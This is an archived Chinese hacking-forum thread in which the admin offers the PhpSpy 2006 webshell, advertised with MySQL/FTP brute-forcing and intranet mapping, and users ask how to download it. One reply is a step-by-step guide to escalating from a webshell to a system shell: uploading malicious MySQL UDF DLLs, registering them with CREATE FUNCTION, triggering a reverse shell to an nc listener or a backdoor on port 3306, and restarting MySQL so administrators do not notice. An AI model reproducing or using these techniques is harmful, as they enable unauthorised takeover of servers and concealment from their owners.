攻略堂 - 攻略 教程 的聚集地's Archiver

admin 发表于 2007-11-12 18:46

PhpSpy 2006 最终修改版

[quote]1. 文件和目录ZIP打包下载
2.MySql和Ftp暴力破解
3.内网计算机名和IP转换
4.利用MySql上传下载文件
5.加入自定义设置
6.Alexa排名,默认关闭
7.使用ADODB执行SQL语句
8.还有其它功能自行体会[/quote]

[attach]676[/attach]

2008 发表于 2007-11-14 14:38

偶,下载这个还要威望限制啊:Q

2008 发表于 2007-11-14 14:38

哎,想要下载个的说

qwe987 发表于 2007-11-15 18:00

不要威望的说!下了~

伊若 发表于 2007-11-18 22:42

太吓人了..................

dzbbs 发表于 2007-11-21 20:33

这个工具不错!!支持了~~
:victory:

天山 发表于 2007-12-18 13:03

工具不错

dsasd 发表于 2007-12-18 15:44

这个工具不错,就是怕当成木马被删掉

伊若 发表于 2008-1-1 16:13

怎么下不了吖?

cnchome 发表于 2008-1-1 21:15

看一下 谢谢~

snowice 发表于 2008-4-8 16:14

要威望啊~~~~~~~~~~~~~~~~

snowice 发表于 2008-4-8 16:23

在回个贴吧5555555555555555555

00100 发表于 2008-4-9 10:11

这个不错 呵呵!~

wind234 发表于 2008-5-3 13:52

没威望!!!!

huaduxu 发表于 2008-5-13 08:41

没有威望

shiran 发表于 2008-6-14 22:36

111111111

wolfling 发表于 2008-7-8 14:53

威望怎么就有了?

fiyour 发表于 2008-7-10 16:58

没有威望啊。。。。怎么搞的

yhyhyh72003 发表于 2008-7-27 18:15

用着想做坏事。。。

serv-u提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 来注册函数.

出现SQL语句成功执行!

离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect('192.168.1.254','1234'); 来激活那个函数,执行成功,然后看看我们的NC有反映没,成功得到CMSHELL,不过这时对方的MYSQL已经假死咯,我们要把MYSQL服务进程给kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该服务器不允许连接任何外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使用方法和Mix一样,连接MYSQL成功后执行如下语句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 执行语句成功后,然后我们就开始激活这个函数,输入语句:select my_udfdoor (''); 然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了.

OK成功!测试结束咯

cpcn 发表于 2008-9-25 19:54

:victory: :victory:

页: [1] 2

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.